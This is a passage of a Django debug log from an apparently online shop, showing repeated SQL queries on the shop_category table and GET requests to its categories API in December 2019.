"shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:04:05,538 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:04:05,542 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:04:05,546 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:04:05,550 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:04:05,554 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:04:05,558 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:04:05,562 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:04:05,566 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:04:05,570 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:04:05] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:04:50,007 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:04:50,011 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:04:50,014 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:04:50,016 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:04:50,018 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:04:50,020 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:04:50,022 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:04:50,025 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:04:50,027 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:04:50,029 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:04:50,031 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:04:50] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 07:05:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 07:06:13,460 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:06:13,468 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:06:13,471 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:06:13,473 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:06:13,475 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:06:13,477 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:06:13,479 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:06:13,482 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:06:13,484 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:06:13,486 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:06:13,488 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:06:13] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:07:48,132 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:07:48,139 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:07:48,143 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:07:48,147 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:07:48,151 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:07:48,154 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:07:48,158 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:07:48,160 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:07:48,163 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:07:48,165 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:07:48,167 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:07:48] "GET /api/v1/categories/ HTTP/1.0" 200 1619 Not Found: /access.log-20191126.gz [09/Dec/2019 07:08:03] "GET /access.log-20191126.gz HTTP/1.0" 404 6660 DEBUG 2019-12-09 07:08:21,541 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:08:21,545 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:08:21,548 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:08:21,550 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:08:21,553 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:08:21,555 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:08:21,557 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:08:21,559 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:08:21,561 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:08:21,564 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:08:21,567 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:08:21] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:08:25,438 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:08:25,443 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:08:25,445 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:08:25,447 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:08:25,450 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:08:25,452 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:08:25,454 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:08:25,456 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:08:25,458 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:08:25,460 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:08:25,462 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:08:25] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 07:09:28,214 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:09:28,219 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:09:28,221 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:09:28,224 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:09:28,226 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:09:28,228 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 